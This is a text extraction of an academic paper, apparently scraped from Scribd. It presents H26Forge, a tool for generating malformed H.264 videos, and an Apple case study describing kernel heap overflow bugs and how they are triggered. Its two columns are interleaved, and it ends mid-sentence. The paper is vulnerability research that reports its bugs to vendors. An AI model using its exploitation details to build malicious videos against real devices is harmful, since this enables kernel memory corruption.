0% found this document useful (0 votes)
73 views18 pages

The Most Dangerous Codec in The World: Finding and Exploiting Vulnerabilities in H.264 Decoders

The document discusses security issues in video decoding software and hardware. It introduces a tool called H26F ORGE that can generate synthetic video files to test decoders. Through two case studies, they uncovered memory corruption bugs across various browsers, media players, and device kernels.

Uploaded by

jimmy.change0435
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
73 views18 pages

The Most Dangerous Codec in The World: Finding and Exploiting Vulnerabilities in H.264 Decoders

The document discusses security issues in video decoding software and hardware. It introduces a tool called H26F ORGE that can generate synthetic video files to test decoders. Through two case studies, they uncovered memory corruption bugs across various browsers, media players, and device kernels.

Uploaded by

jimmy.change0435
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 18

The Most Dangerous Codec in the World:

Finding and Exploiting Vulnerabilities in H.264 Decoders

Willy R. Vasquez Stephen Checkoway Hovav Shacham


The University of Texas at Austin Oberlin College The University of Texas at Austin

Abstract self-contained, sandboxed software libraries, the attack sur-


Modern video encoding standards such as H.264 are a marvel face for video processing is larger, more privileged, and, as
of hidden complexity. But with hidden complexity comes we explain below, more heterogeneous.
hidden security risk. Decoding video in practice means in- On the basis of a guideline they call “The Rule Of 2,”2 the
teracting with dedicated hardware accelerators and the pro- Chrome developers try to avoid writing code that does more
prietary, privileged software components used to drive them. than 2 of the following: parses untrusted input, is written in
The video decoder ecosystem is obscure, opaque, diverse, a memory-unsafe language, and runs at high privilege. The
highly privileged, largely untested, and highly exposed—a video processing stack in Chrome violates the Rule of 2, and
dangerous combination. so do the corresponding stacks in other major browsers and
in messaging apps—because the platform code for driving
We introduce and evaluate H26F ORGE, domain-specific
the video decoding hardware, on which they all depend, itself
infrastructure for analyzing, generating, and manipulating syn-
violates the Rule of 2.
tactically correct but semantically spec-non-compliant video
Because different hardware video accelerators require dif-
files. Using H26F ORGE, we uncover insecurity in depth
ferent drivers, the ecosystem of privileged video processing
across the video decoder ecosystem, including kernel memory
software is highly fragmented; our analysis of Linux device
corruption bugs in iOS, memory corruption bugs in Firefox
trees revealed two dozen accelerator vendors. There is no
and VLC for Windows, and video accelerator and application
one dominant open source software library for security re-
processor kernel memory bugs in multiple Android devices.
searchers to audit.
And the features that make modern video formats so effec-
1 Introduction tive also make it hard to obtain high code coverage testing
of video decoding stacks by means of generic tools. Con-
Modern video encoding standards are a marvel of hidden sider H.264, the most popular video format today. H.264
complexity. As SwiftOnSecurity noted, the video-driven ap- compresses videos by finding similarities within and across
plications we take for granted would not have been possible frames; the similarities and differences are sent as entropy-
without advances in video compression technology, notwith- encoded syntax elements. These syntax elements are encoded
standing increases in computational power, storage capacity, in a context-sensitive way: a change in the value of one syntax
and network bandwidth.1 But with hidden complexity comes element completely changes the decoder’s interpretation of
hidden security risk. the rest of the bitstream.
The H.264 specification is 800 pages long—despite spec- An illustrative example: CVE-2022-22675. On March 31,
ifying only how to decode video, not how to encode it. Be- 2022, Apple released iOS 15.4.1, which patched a bug in
cause decoding is complex and costly, it is usually delegated the kernel driver for the AppleAVD video accelerator family,
to hardware video accelerators, either on the GPU or in a included in SoCs starting with 2018’s A12. The release notes
dedicated block on a system-on-chip (SoC). Decoding video state that “Apple is aware of a report that this issue may have
in practice means interacting with these privileged hardware been actively exploited.”3
components and the privileged software components used to Google Project Zero’s Natalie Silvanovich performed a
drive them, usually a system media server and a kernel driver. root cause analysis of the bug [43]. By comparing the pre-
Compared to other types of media that can be processed by
2 Online: https://chromium.googlesource.com/chromium/src/+/
1 Online: https://twitter.com/SwiftOnSecurity/status/ main/docs/security/rule-of-2.md.
888822886420668422. 3 Online: https://support.apple.com/en-us/HT213219.
and post-patch drivers, she identified a missing bounds check 3. Starting from the binary diff from the CVE-2022-22675
on the cpb_cnt_minus1 syntax element; she was able to patch, we were able to expand on Silvanovich’s root-
produce a video that triggered the added check, but not one cause analysis, generate a proof-of-concept video that
that caused a kernel panic. The problem was a failure of tools. corrupts the kernel heap and causes a panic, and explain
As Silvanovich explained on Twitter, she “forged the file bit why Silvanovich’s partial proof-of-concept, despite also
by bit and it was terrible. One trick I use is to build ffmpeg triggering the patch, did not cause a panic.
with symbols and break where the feature you are trying to In the second case study, we played a larger corpus of
trigger is (for example reading HRD) [. . . ] Then you can random H26F ORGE-generated videos on a variety of Win-
dump the bitstream with gdb and search for the corresponding dows software and Android systems from many dated but still
location in the file and edit it.”4 relevant vendors. In all, we identified a memory corruption
Our contributions. We introduce and evaluate H26F ORGE, vulnerability in Firefox video playback; a use-after-free in
domain-specific infrastructure for analyzing, generating, and hardware-accelerated VLC video playback; and insecurity
manipulating syntactically correct but semantically spec-non- in depth across the hardware decoder ecosystem, including
compliant video files. disclosure of uninitialized memory and of prior decoder state;
H26F ORGE maintains the recovered H.264 syntax ele- accelerator memory corruption; and kernel driver memory
ments in memory and allows for the programmatic adjust- corruption and crashes.
ment of syntax elements, while correctly entropy-encoding Disclosure and ethics. We have contacted (or attempted to
the adjusted values. No prior tool is suited to this task. Most contact; see below) all the vendors affected by our memory
software that read H.264 videos (e.g., OpenH264 and FFm- corruption findings.
peg) focuses on producing an image as quickly as possible, Apple and Mozilla have acknowledged, patched, and as-
so it discards recovered syntax elements once an image is signed CVEs to reported bugs. The VLC maintainers have
generated. Tools used to debug video files (e.g., Elecard’s fixed the reported bug. We have reported the disclosure of
StreamEye) do not allow the programmatic editing of syntax uninitialized memory to Google and MediaTek. We reported
elements; they focus on providing feedback to tune a video the denial-of-service vulnerability to MediaTek.
encoder. Some vendors—particularly those that sell media intellec-
H26F ORGE can be used as a standalone tool that generates tual property (“media IP”) to SoC vendors and do not regu-
random videos for input to a video decoder; it can be pro- larly deal with end users—did not respond when we reached
grammed to produce proof-of-concept videos that trigger a out.
specific decoder bug identified by a security researcher; and
it can be driven interactively by a researcher when exploring
“what-if?” scenarios for a partly understood vulnerability. 2 Background
We evaluate the effectiveness of H26F ORGE through two
We describe the features of H.264 video compression and
case studies.
highlight the deployed implementations relevant to the find-
In the first case study, we examine the security of the Ap-
ings we report in this paper. Readers interested in a longer, but
pleAVD kernel driver and the AppleD5500 kernel driver used
still accessible, introduction to H.264 should consult Richard-
for pre-A12 SoCs.5
son’s monograph [41].
1. By playing a few hundred random H26F ORGE-
generated videos on an iPhone with an A9 SoC we iden-
tified two bugs. One is exploitable for controlled kernel 2.1 H.264 codec
heap corruption; the other triggers an infinite loop in a
The H.264 video codec [23] was standardized in 2003 by
kernel thread, causing a watchdog reboot.
the International Telecommunication Union (ITU) and the
2. We reverse engineered the AppleD5500 driver binary and
Motion Picture Experts Group (MPEG). Because of this joint
identified an apparent missing bounds check in H.265
effort, this codec has two names: H.264 provided by the ITU,
parameter parsing. While H26F ORGE does not support
and AVC provided by MPEG. We default to H.264 when
H.265 generation, the parameter-level entropy encod-
possible.
ing is similar, and we were able to produce a proof-of-
The specification describes how to decode a video, leaving
concept video that exploits the missing bounds check to
encoding strategies up to software and hardware developers.
corrupt the kernel heap and gives the attacker control of
Video encoding is the search problem of finding similarities
the program counter.
within and between pictures, and turning these similarities
4 Online: https://twitter.com/natashenka/status/ into entropy-encoded instructions. The H.264 spec describes
1526440524441194496. how to recover the instructions and reproduce a picture.
5 Some Twitter commentary about CVE-2022-22675 assumed that Apple

only recently moved video parsing into the iOS kernel. Not so. In fact, the YUV, macroblocks, and slices. A video is a collection of
first bug we identified was present in the kernel as far back as iOS 10. pictures or frames made up of pixels. Each pixel is broken
down into two components: luma (brightness) and chroma level properties of the video such as: profile, level, frame
(color). In H.264, luma is denoted as Y and chroma as U and size, cropping, etc. The spec allows for up to 32 SPSes
V, where the latter denote blue and red components, respec- in a video, but only one active at a time.
tively, and are used to recover the green component through a • Picture Parameter Sets (PPS): PPSes contain the com-
set of linear equations. Together these are called YUV values. pression parameters and picture reconstruction instruc-
In H.264, frames are split into groups of 16 × 16 pixels tions. The spec allows for up to 256 PPSes. A PPS must
called macroblocks, Macroblocks are the core unit used when reference a valid SPS in a video.
working with frames. Macroblocks are grouped together into • Instantaneous Decoder Refresh (IDR) NALUs: IDR
slices, which are used to create frames. NALUs contain slices and force the decoder to clear
Prediction and deblocking. H.264 compresses videos by out its DPB, therefore they should only contain Intra
relying on prediction techniques to recreate a video at the predicted slices (I slices), which do not reference any
endpoint. What is sent is the prediction instructions and the other frames. The first frame in a video is also expected
residue: the difference between the predicted frame and the to be an IDR NALU. An IDR NALU must point to a
actual frame. There are two types of prediction mechanisms valid PPS. Slices are split into slice headers with pic-
in H.264: Intra prediction and Inter prediction. ture information, and slice data with macroblocks that
contain the prediction instructions and residue.
Intra prediction looks for similarities within the same frame
• Non-IDR NALUs: Non-IDR NALUs contain slices that
at macroblock granularity. For a macroblock, the decoder
can be Intra or Inter predicted, but maintain the decoder
takes the edge pixels of neighboring macroblocks and predicts
state. Single Inter predicted slices (P slices) contain
the image using a linear combination of these values. It then
macroblocks that reference a single frame. Bipredicted
adds the residue to the predicted image to get the resulting
slices (B slices) can reference two frames. A non-IDR
output image.
NALU also points to a valid PPS.
Because images are sometimes simply translated across the
screen, Inter prediction looks for similarities across frames. Syntax elements may have dependencies that impact how
Inter-predicted frames copy macroblocks from reference subsequent ones are decoded. Modifying one syntax element
frames and apply residues to construct the final macroblock. changes not only how the picture is produced but also how
The decoder maintains a Decoded Picture Buffer (DPB), and the stream is read.
uses it to create a list of reference pictures. Different mac- Entropy encoding. To compress syntax elements, H.264
roblocks in the same picture can reference different frames in entropy encodes them with either stateless or stateful encoding
the buffer. If macroblocks in a frame uses only one reference procedures.
frame, then the frame is referred to as a P frame. If two refer- Stateless entropy encodings do not rely on neighboring val-
ence frames are used, then it is referred to as a B frame (for ues, and include binary, unary, and exponential-Golomb (exp-
biprediction). Golomb). All SPSes, PPSes, and slice headers are encoded in
Because frames are reconstructed at the macroblock level, this stateless manner and are often handled by software.
the decoder applies deblocking on the macroblock edges to Stateful entropy encodings rely on previously decoded val-
produce a smoother image. ues and are used within slice data to encode prediction modes
Profiles and levels. A profile in H.264 signals what features and residue values. The two encoding options are Context-
are used to decode the video. Features include the type of Adaptive Variable Length Coding (CAVLC) and Context-
entropy encoding and the presence of B frames. The most Adaptive Binary Arithmetic Coding (CABAC). CAVLC is
common profiles are Baseline, Main, and High. a run-length encoding, meaning that a value is sent along
The level of a video signals the possible frame size of the with the number of times the value consecutively appears.
video, how many frames to store in the DPB, and what the CABAC is an arithmetic encoding in which binary values are
maximum possible bit rate should be. recovered from a probability model that adjusts to the current
Syntax elements. Video reconstruction instructions are and previous syntax elements. Both CAVLC and CABAC
called syntax elements. The possible values each syntax el- are more resource-intensive than the stateless options and are
ement can be assigned are determined by the semantics of thus often handled by hardware.
the H.264 syntax elements. The values guide the decoder in Encoded value organization. Encoded NALUs can be or-
choosing prediction variables and recovering residue informa- ganized in one of two ways: in “Annex B” format, or AVCC
tion. format. “Annex B” format [23] denotes the beginning of a
Syntax elements are grouped together into Network Ab- NALU with start codes of value 0x00000001 or 0x000001.
straction Layer Units (NALUs). NALUs have a header signal- AVCC format includes the length of each NALU instead of
ing the type of content they contain. While the spec allows a start code, and is used in MP4 files, with the avcC four
for up to 32 different types of NALUs, the most common are: character code atom containing the SPS and PPS parameters
• Sequence Parameter Sets (SPS): these contain the high- for the video, and mdat atom containing the slices.
Both formats go through a process called emulation- Web. Web browsers have long allowed pages to incorporate
prevention, in which sequential 0x00 values within the video to play through the video HTML tag, leading to mul-
encoded stream are ‘escaped’ by inserting an emulation- tiple vulnerabilities in video decoding. For example, both
prevention byte, 0x03, after every two 0x00s. This is to Chrome and Firefox were affected by a 2015 bug in VP9
prevent the decoder from confusing the sequence as a start parsing.7 In Section 6.1 we describe a new vulnerability we
code. found in Firefox’s handling of H.264 files.
H.264 features and extensions. The H.264 specification has Despite this track record, more video processing attack
a collection of features that are enabled by different profiles. surface is being exposed to the Web platform. Media Source
Arbitrary Slice Ordering (ASO) is an error resilience feature Extensions (MSE) and Encrypted Media Extensions (EME)
that allows for frames to be made up of many slices that can have been deployed in major browsers; the WebCodecs ex-
arrive at any time. Flexible Macroblock Ordering (FMO) is tension [1], currently only deployed in Chrome, will allow
like ASO, but also allows for macroblocks to be arranged in websites direct access to the hardware decoders, completely
different shapes. Both are part of the Baseline profile. skipping over container format checks.
Since its introduction, the specification has added exten- Modern browsers carefully sandbox most kinds of media
sions for new applications and scenarios. Two notable ones processing libraries, but they call out to system facilities for
are Scalable Video Coding (SVC) and Multiview Video Cod- video decoding. Hardware acceleration is more energy effi-
ing (MVC), which allow for multiple sizes in one encoded cient; it allows playback of content that requires a hardware
video or multiple angles in a single video, respectively. root of trust [38]; and it allows browsers to benefit from the
patent licensing fees paid by the hardware suppliers.8
Decoding pipeline. We now describe how the components
are combined to decode a typical H.264 video. Online platforms. Video transcoding pipelines, such as at
First, the decoder is set up by passing in an SPS and a PPS YouTube [40], and Facebook [26], handle user-generated con-
with frame and compression related properties. Then the de- tent, which may contain videos that are not spec-compliant.
coder receives the first slice and parses the slice header syntax This could lead to denial-of-service, information leakage
elements. The decoder then begins a macroblock-level recon- from the execution environment or other processed videos,
struction of the image. It then entropy decodes the syntax or even code execution.
elements and passes them to either a residue reconstruction
path or through a frame prediction path with previously de- 2.3 Hardware video decoding
coded frames. Then the predicted frames are combined with
the residue, passed through a deblocking engine, and finally Video decoding in modern systems is accelerated with custom
stored in the DPB, where the frames can be accessed and hardware. The media IP included in SoCs or GPUs is usually
presented. licensed from a third party. In one notable example, iPhone
SoCs through the A11 include Imagination Technologies’
D5500 media IP (see Section 5), as do the SoCs in several
2.2 Software systems that manipulate video Android phones we study, with very different kernel drivers
A wide range of software systems handle untrusted video files, layered on top.
providing a broad attack surface for codec bugs. OS integration. IP vendors build drivers for their hardware
An important observation is that hardware-assisted video video decoders, which are then called by the OS through their
decoding bypasses the careful sandboxing that is otherwise own abstraction layer. The drivers will prepare the hardware
in place to limit the effects of media decoding bugs. to receive the encoded buffers often through shared memory.
Messengers. Popular messengers will accept video attach- In this section, we discuss the different OS layers provided to
ments in messages and provide a thumbnail preview noti- interface with drivers.
fication. In the default configuration of many messengers, While Stagefright is Android’s Media engine,9 Android
the video is processed to produce the thumbnail without user uses OpenMAX (OMX) to communicate with hardware
interaction, creating a zero-click attack surface. drivers. OMX abstracts the hardware layer from Stagefright,
There are many examples of video issues on mobile de- allowing for easier integration of custom hardware video de-
vices. Android has had historical issues in its Stagefright coders.
library for processing MP4 files [10, 11]. As we discuss Other operating systems similarly have their own abstrac-
in Section 5, video thumbnailing and decoding constitutes tion layer. The Linux community has support for video de-
exploitable attack surface in Apple’s iMessage application
advisories/2022/.
despite the BlastDoor sandbox [18]. Third-party messengers 7 CVE-2015-1258 and https://crbug.com/450939 for Chrome; CVE-
can also be affected. In September, WhatsApp disclosed a 2015-4506 and https://bugzilla.mozilla.org/show_bug.cgi?id=
critical bug in its parsing of videos on Android and iOS.6 1192226 for Firefox.
8 For example, Firefox won’t play H.264 videos absent hardware support.
6 CVE-2022-27492, https://www.whatsapp.com/security/ 9 Online: https://source.android.com/docs/core/media.
Table 1: Companies that produce hardware video de- H26FORGE
coders. Inputs Input Handling Syntax Manipulation Output Handling Outputs

Video Video MP4 Muxing Muxed MP4


Company Product Name Transform Modification

Allegro DVT AL-D series


Allwinner CedarV Encoded Entropy Entropy Encoded
Bitstream Decoding Encoding Bitstream
AMD Video Coding Engine
Amlogic Amlogic Video Engine JSON
Dump
Amphion1 Malone Generation Video
WebCodecs
AVCC.js
AVCC
Apple AppleAVD Parameters Generation
JSON Dump
Arm Mali Video Engine
Broadcom Crystal HD and VideoCore
Cast Baseline Decoders
Chips’N Media Coda
Figure 1: H26F ORGE internals.
HiSilicon VDEC
Imagination Technologies PowerVR MSVDX D-series potential for vulnerabilities to exist within or across products.
Intel QuickSync
MediaTek VPU
MSTar Semi2 Decoder
Nvidia NVDEC
3 Threat Model
Qualcomm Venus
Realtek RTD series In this paper, we assume an adversary who (1) produces one or
RockChip3 RKVdec more malicious video files; and (2) causes one or more targets
Samsung Multi-Format Codec (MFC) to decode the videos. As we discuss in Section 2.2, delivering
STMicroelectronics DELTA
Texas Instruments IVA-HD videos to the user and having them be decoded—with or
UNISOC 4 Video Signal Processing Unit (VSP) without user interaction—is easy to accomplish in many cases.
VeriSilicon Hantro This is the minimal set of capabilities an adversary needs to
VYUSync H.264 Decoder
exploit a vulnerability in decoding software or hardware.
1 Purchased by Allegro DVT.
2 Merged
For information disclosure attacks (see, for example, Sec-
with MediaTek; main use is set-top boxes.
3 May just be VeriSilicon Hantro. tions 6.1 and 6.3.2), the adversary (3) must be able to read
4 Formerly Spreadtrum. frames of decoded video. For malicious videos delivered
via the web, for example, this can be accomplished via
coders through the Video for Linux API version 2.10 Similar JavaScript.
to OMX, it abstracts the driver so user space programs do
not have to worry about the underlying hardware. Windows
relies on DirectX Video Acceleration 2.011 and Apple uses
4 H26F ORGE
VideoToolbox.12 Intel also has its own Linux abstraction layer
This section describes H26F ORGE, domain-specific infras-
called the Video Acceleration API 13 and, similarly Nvidia
tructure for analyzing, generating, and manipulating syntacti-
has the Video Decode and Presentation API for UNIX.14
cally correct but semantically spec-non-compliant video files.
Hardware video decoding companies. Table 1 lists 25 com- The goal of H26F ORGE is to reduce the burden of work-
panies we found that have unique video decode IPs. Some ing with H.264 encoded videos when evaluating H.264 de-
of these may license from other companies, or may produce coders. H26F ORGE is available at https://github.com/
their own video codec IP. The companies include providers h26forge/h26forge.
for Single-Board Computers (SBCs), set-top boxes, tablets, H26F ORGE has two main modes of operation: editing
phones, and video conferencing systems. Some video decode and generation. We provide an overview of H26F ORGE then
IP companies describe providing drivers, RTL, and models describe each mode in detail.
for incorporating the IP into SoCs.
We highlight all of these companies to showcase the het-
erogeneity of available hardware video decoders, and thus the 4.1 Overview
10 Online:
Implementation. H26F ORGE is written in around 30k lines
https://www.kernel.org/doc/html/latest/userspace-
api/media/v4l/v4l2.html.
of Rust code, and has a Python scripting backend for writ-
11 Online: https://learn.microsoft.com/en-us/windows/win32/ ing video modification scripts. Figure 1 shows the various
medfound/directx-video-acceleration-2-0. components of H26F ORGE. It has three main parts: input
12 Online: https://developer.apple.com/documentation/ handling, syntax manipulation, and output handling. The in-
videotoolbox.
13 Online: https://www.intel.com/content/www/us/en/
put handling contains the H.264 entropy decoding. Syntax
developer/articles/technical/linuxmedia-vaapi.html. manipulation has functions for modifying recovered syntax
14 Online: https://vdpau.pages.freedesktop.org/libvdpau/. elements or generating random videos. Output handling has
Listing 1: Luma Chroma Thief video transform example.
1 def luma_chroma_thief_16x16 ( ds ) :
2 " " " Turn f i r s t s l i c e i n t o a LCT u s i n g 16 x16 luma chroma p r e d i c t i o n " " "
3 from s l i c e _ o n e _ r e m o v e _ r e s i d u e i m p o r t r e m o v e _ f i r s t _ f r a m e _ r e s i d u e
4 from h e l p e r s i m p o r t s e t _ c b p _ c h r o m a _ a n d _ l u m a
5
6
ds = r e m o v e _ f i r s t _ f r a m e _ r e s i d u e ( ds )
# d i s a b l e deblocking f i l t e r to prevent post − processing
Figure 2: An example of a generated I frame.
7 ds [ " ppses " ] [ 0 ] [ " d e b l o c k i n g _ f i l t e r _ c o n t r o l _ p r e s e n t _ f l a g " ] = True
8 ds [ " s l i c e s " ] [ 0 ] [ " sh " ] [ " d i s a b l e _ d e b l o c k i n g _ f i l t e r _ i d c " ] = 1
9
10
f o r i i n range ( l e n ( ds [ " s l i c e s " ] [ 0 ] [ " sd " ] [ " macroblock_vec " ] ) ) :
# luma p r e d i c t i o n s e t by M a c r o b l o c k t y p e 4.2 Editing mode
11 d s [ " s l i c e s " ] [ 0 ] [ " s d " ] [ " m a c r o b l o c k _ v e c " ] [ i ] [ " mb_type " ] = " I 1 6 x 1 6 _ 0 _ 0 _ 0 "
12 # ensure values are c o r r e c t for encoding
13 ds [ " s l i c e s " ] [ 0 ] [ " sd " ] [ " macroblock_vec " ] [ i ] [ " c o d e d _ b l o c k _ p a t t e r n " ] = 0 Users can programmatically edit a video with Python scripts
14 ds = set_cbp_chroma_and_luma ( 0 , i , ds )
15 # v e r t i c a l chroma p r e d i c t i o n called video transforms. We use this feature to generate non-
16 ds [ " s l i c e s " ] [ 0 ] [ " sd " ] [ " macroblock_vec " ] [ i ] [ " intra_chroma_pred_mode " ] = 2
17 r e t u r n ds conforming videos as well as videos containing specific syn-
tax elements. To help transform writers, we wrote a “helper”
library with commonly encountered actions such as updating
the H.264 entropy encoding, which outputs videos in “An-
dependent variables or creating NALUs with default values.
nex B” format, but can also output a WebCodecs friendly
As an example of how editing mode works, we introduce a
AVCC file, muxed MP4 file, or JSON dump of the decoded
video that has all top-most macroblocks set to vertical Intra
syntax elements. For MP4 muxing, we rely on a modified
prediction called Luma Chroma Thief. Non-spec behavior
version of the minimp4 Rust crate that avoids modifying the
like what Luma Chroma Thief exhibits would not naturally
generated H.264 bitstream, and inserts only the first observed
arise in an encoded video, and manual creation of such a video
SPS and PPS into the avcC atom.
would be difficult due to values being CABAC encoded. In
H26F ORGE works by entropy decoding and encoding Listing 1, we show how to produce Luma Chroma Thief with
H.264 bitstreams and maintaining the recovered syntax values a video transform that sets all the first slice macroblocks to
in memory for mutation. We initially considered modifying be vertically Intra predicted with only 17 lines of code. This
an existing tool that does H.264 encoding and decoding but example demonstrates how transforms can build on top of
found all to be poorly suited for this task. Specifically, ex- each other, here using a transform that removes the first frame
isting tools focus on producing frames of video as quickly residue. This example also shows how some of the dependent
as possible rather than manipulating the syntax elements that syntax elements are changed by setting the individual coded
make up the video. As a result, the syntax elements them- block pattern luma and chroma components.
selves are discarded as soon as the video frame is decoded. In Section 5.3 we further demonstrate how we use video
Since the overall architecture and core data structures of exist- transforms to produce iterative videos to gain an understand-
ing tools would need to be significantly modified to suit our ing of—and exploit—a bug in the Apple video decoder.
goals, we opted for a green field implementation.

Evaluating correctness. By focusing only on entropy- 4.3 Generation mode


decoding and encoding syntax elements, H26F ORGE sup-
Video generation is the process of producing videos with
ports many H.264 features. Crucially, H26F ORGE maintains
syntax elements at a desired value or range. Given the de-
the dependencies across syntax elements, enabling the correct
pendencies between syntax elements, H26F ORGE will en-
entropy-encoding of slice data. H26F ORGE supports a major-
sure dependencies are maintained as values are randomized.
ity of the Baseline, Main, Extended, and High profiles, and
H26F ORGE comes with the syntax element ranges set to their
some features of the SVC and MVC extensions. H26F ORGE
minimum and maximum possible values, but they can be
does not currently support CAVLC 422/444 chroma subsam-
adjusted by passing in generation parameters. H26F ORGE
pling, FMO decoding, and SVC/MVC slices.
purposefully ignores non-syntax enforced constraints detailed
Because entropy encoding and decoding is a complex pro- by the H.264 specification, such as the fact that certain fea-
cess, we verified the correctness of H26F ORGE by running it tures are allowed only in certain profiles.
on the official test videos provided by the ITU [24]. Accord- Figure 2 shows an example of a generated I frame, featuring
ing to the ITU, a decoder can claim conformance to a profile randomized prediction modes and residue values.
and level if it can decode the associated test videos.
Generation options. When generating videos, H26F ORGE
We tested H26F ORGE on the Constrained Baseline, Base- can ignore certain syntax elements or combinations to focus
line, Extended, and Main profiles, as these are the profiles sup- efforts on different areas of interest. For example, lossless
ported by the majority of decoders we examine. We achieve macroblocks do not stress the video decoder because the YUV
98% conformance on the test videos. Of the 135 test videos, values are directly passed, so H26F ORGE includes an option
80 are bit-for-bit identical after re-encoding with H26F ORGE, to ignore them. If we want to focus on finding vulnerabil-
52 have the same syntax elements, and 3 Baseline videos ities at the parameter set level, H26F ORGE has an “empty
cannot be decoded by H26F ORGE because they use FMO. slice data” option which produces no residue and no predic-
tion instructions. Because some decoders may only check 5.1 Finding new vulnerabilities
the bounds of SPS and PPS parameters during initialization,
We used H26F ORGE’s H.264-grammar-aware video genera-
H26F ORGE provides a “safe prepend” option that prepends a
tor (see Section 4.3) to produce syntactically correct H.264
known good video to the encoded output, so that subsequent
video streams with structured random data. We played these
SPSes and PPSes stress test runtime checking.
videos on a physical iPhone SE (first generation) with an A9
To facilitate exploration of decoder features, H26F ORGE
SoC running iOS 13.3 and on a virtual iPhone SE (first gener-
has a “small” video generation option that limits the frame
ation) running iOS 15.5 (most recent at time of discovery) in
size to 128 × 128 pixels. This significantly reduces the video
Corellium.15 Corellium gives us kernel debugging capabilities
generation time, though it reduces the ability to explore issues
along with the ability to test on different iOS versions.
that may arise from large frame buffers.
Our fuzzing setup consisted of (1) generating a batch of
Global video parameters. Generation mode starts by sam- 100 videos on a host machine, (2) transferring them to the iOS
pling global video parameters. First is the number of NALUs device under test (through iTunes on the physical phone and
to generate for the video—longer videos require more time via scp on the virtual phone), (3) scrolling through the folder
to generate, but may expose stateful vulnerabilities. Next is the videos were in to trigger thumbnailing, (4) then opening
whether to enable certain H.264 extensions such as SVC or each video in the QuickLook viewer to decode completely.
MVC. Because extensions are often not supported by video We tested 67 batches in all.
decoders, H26F ORGE biases towards no extensions, but this With this setup, we found two bugs in the AppleD5500.kext.
can be adjusted. With these two global video parameters, The first bug enables a partly-controlled heap memory over-
H26F ORGE proceeds to generate the contents of each NALU. write. The second bug causes an infinite loop and leads to
Parameter set and slice generation. All decoding interfaces a kernel panic. These bugs have been confirmed, patched,
require passing in the SPS and PPS to prepare the decoder, and assigned CVEs by Apple. We verified that they can be
so H26F ORGE generates those first. After that, H26F ORGE triggered by a web page visited in Safari.
leans towards producing slice NALUs. The first slice is biased Bug 1: partly-controlled heap memory overwrite. The
towards being an IDR I slice to reduce the likelihood that the first issue we discovered is an out-of-bounds kernel write
decoder quits at the first slice. Even though decoders are caused by a buffer overflow in the bitstream reader of the
expected to be error-resilient, generally having no reference AppleD5500.kext. The overflow can be triggered by playing
frame prevents B or P slices from being properly decoded. or generating a preview thumbnail of a malformed video. A
As the slices are generated, it takes into consideration slice video randomly generated by H26F ORGE triggered this bug
property options, such as no lossless macroblocks or empty and caused a kernel panic due to a write to an unmapped
residue values. address; we then reverse engineered the affected code to per-
form a root-cause analysis and used H26F ORGE interactively
to show that the bug is exploitable for controlled heap corrup-
5 Using H26F ORGE: An Apple case study tion. This was assigned CVE-2022-32939 and patched in iOS
15.7.1 and 16.1 and iPadOS 15.7.1 and 16 [2, 3].
H26F ORGE’s ability to produce syntactically correct H.264
Recall from Section 2.1 that emulation-prevention bytes
files with specific semantic errors enables multiple modes of
(EPBs) are used to escape patterns that may be confused
security analysis. In the following sections, we describe three
as NALU start codes in an encoded stream. The Apple-
different ways to use H26F ORGE. First, H26F ORGE can
D5500.kext bitstream reader object keeps track of how many
be used to find new vulnerabilities in video-handling code.
EPBs it has seen, along with the bit offset in the bitstream
Second, H26F ORGE enables the analyst to produce proof-
where each EPB was found (presumably to simplify subse-
of-concept videos which validate their understanding of a
quent stream processing).
bug. Third, H26F ORGE enables rapid interactive testing to
The array in which EPB offsets are tracked has 256 ele-
understand existing exploits.
ments, but a check that no more than 256 EPBs have been
We explore each of these three analytical modes in the con-
encountered is missing. A 257th EPB overflows the array and
text of Apple’s iOS video-handling drivers. For the first two
overwrites the reader object member variable immediately
parts we look at issues in the AppleD5500 kernel extension
after it, which happens to be the count of EPBs encountered
(kext), found on A11 SoCs and older. The D5500 is Imagi-
so far. As a consequence, the location of a 258th EPB will be
nation Technologies’ media IP that decodes MPEG4, H.264,
recorded at an array index now controlled by the attacker. Sub-
and H.265, and the AppleD5500.kext is the driver to facilitate
sequent EPBs will trigger contiguous out-of-bounds writes as
hardware communication. For our third analytical mode we
this count is incremented.
look at the AppleAVD.kext, Apple’s in-house video decode IP
The bug therefore gives the attacker a heap skip-and-write
available in A12 SoCs and newer that handles H.264, H.265,
primitive, with the location of the 257th EPB controlling
and VP9 video decoding. While both drivers decode H.264,
the vulnerabilities are only applicable to the noted driver. 15 Online: https://www.corellium.com/.
the amount of the skip, and the locations of the 258th and code. Due to the complexity of modern video encodings like
subsequent EPBs controlling the values written after the skip. H.264, it is difficult to create a test video which demonstrates
File format constraints mean that the skip amount and the the existence of the bug. This is due to a lack of appropriate
values written are only partly attacker controlled. The EPBs tooling. For example, existing video encoders will not pro-
must be in a single NALU, as the bitstream reader context duce such spec-nonconforming videos and due to the nature
is reset with each NALU. Details of how an EPB offset is of the entropy encoding, making localized changes to existing
calculated and stored mean that the values written after the videos with a hex editor is difficult.
skip are small negative 32-bit values.16 With H26F ORGE, the process of producing a proof of
With the help of H26F ORGE, we were able to confirm that concept is simplified. The analyst starts with an existing
a malicious video can overwrite heap memory following the video and uses H26F ORGE to transform it into a video that
bitstream reader object with (small negative) values of the has the desired property. Because H26F ORGE understands
attacker’s choice, confirming our root-cause analysis. Exploit- the video format, the resulting video will be syntactically
ing the bug for kernel code execution would require careful correct.
kernel heap grooming to choose the overwritten object, and A bug in H.265 decoding. Through reverse engineering
likely a kernel memory disclosure bug to defeat kernel ASLR. of the H.265 decoder in the AppleD5500.kext for iOS 15.5,
We did not attempt to develop an end-to-end exploit chain; we discovered what appeared to be a missing bounds check
however, Apple’s assessment was that the bug may allow an potentially leading to a heap overflow in the H.265 decode
app “to execute arbitrary code with kernel privileges.” object. To verify this, we modified H26F ORGE with enough
Bug 2: infinite loop. The second issue we discovered was a H.265 tooling to produce a proof-of-concept video that causes
